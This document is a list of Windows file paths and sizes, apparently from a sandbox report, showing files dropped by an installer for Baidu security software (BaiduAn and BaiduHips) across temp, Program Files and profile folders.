%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
%WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
%Documents and Settings%\All Users\Desktop\百度å«士.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士.lnk (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\å¸载百度å«士.lnk (880 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
